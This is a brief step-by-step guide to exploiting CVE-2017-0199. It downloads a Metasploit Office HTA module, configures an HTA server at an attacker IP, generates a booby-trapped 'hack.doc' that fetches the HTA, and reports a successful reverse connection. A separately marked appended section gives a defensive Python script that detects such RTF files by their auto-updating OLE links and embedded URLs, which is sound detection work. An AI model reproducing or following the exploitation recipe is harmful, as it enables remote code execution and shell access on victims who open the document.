CVE-2017-0199 exploitation
1 Download the exploit script
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb

2 Copy the script
cp office_word_hta.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat

3 Generate the HTA
1: Run msfconsole
2: search hta_server
3: set SRVHOST 192.168.5.209
4: run

4 Generate the doc
1: use exploit/windows/fileformat/office_word_hta
2: set TARGETURI http://192.168.5.209:8082/52jdF5Inq.hta
3: set FILENAME hack.doc

5 Run the file
The reverse connection is obtained successfully.
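To triage a file like the hack.doc produced in step 4, the following check is an added example and not part of the original post. It assumes, from knowledge outside this page, that such a document is RTF carrying an auto-updating OLE link object (`\objautlink`, `\objupdate`) whose `\objdata` hex holds the remote URL; the sample bytes and the 198.51.100.7 URL are constructed.

```python
import re

# Control words that make Word refresh a linked OLE object on open (assumed indicator).
AUTO_LINK = re.compile(rb"\\objautlink\b")
AUTO_UPDATE = re.compile(rb"\\objupdate\b")
# Hex payload of an embedded object: {\*\objdata <hex digits and whitespace>
OBJDATA = re.compile(rb"\{\\\*\\objdata\s*([0-9A-Fa-f\s]+)")
URL_ASCII = re.compile(rb"https?://[\x21-\x7e]{4,}")
URL_UTF16 = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00){4,}")


def link_urls(data: bytes) -> list:
    """Decode every objdata hex blob and return the URLs found inside it."""
    urls = []
    for match in OBJDATA.finditer(data):
        hexstr = re.sub(rb"\s+", b"", match.group(1))
        hexstr = hexstr[: len(hexstr) & ~1]  # drop a dangling nibble
        blob = bytes.fromhex(hexstr.decode("ascii"))
        urls += [u.decode("ascii") for u in URL_ASCII.findall(blob)]
        urls += [u.decode("utf-16-le") for u in URL_UTF16.findall(blob)]
    return urls


def triage(data: bytes) -> dict:
    """Flag RTF content that has an auto-updating OLE link pointing at a URL."""
    is_rtf = data.lstrip().startswith(b"{\\rt")
    auto = bool(AUTO_LINK.search(data) and AUTO_UPDATE.search(data))
    urls = link_urls(data)
    return {"rtf": is_rtf, "auto_update_link": auto, "urls": urls,
            "suspicious": is_rtf and auto and bool(urls)}


# Constructed samples: a minimal RTF with a linked object, and a plain RTF.
SAMPLE_URL = "http://198.51.100.7:8082/sample.hta"
SUSPECT = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate"
           b"{\\*\\objclass Word.Document.8}{\\*\\objdata 01050000\n"
           + SAMPLE_URL.encode("utf-16-le").hex().encode("ascii")
           + b"00000000}}}")
BENIGN = b"{\\rtf1\\ansi Quarterly report, no embedded objects.}"

if __name__ == "__main__":
    for name, data in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, triage(data))
```

This handles only plain hex in `\objdata`; RTF that hides the hex behind extra control words needs a full parser such as rtfobj from oletools.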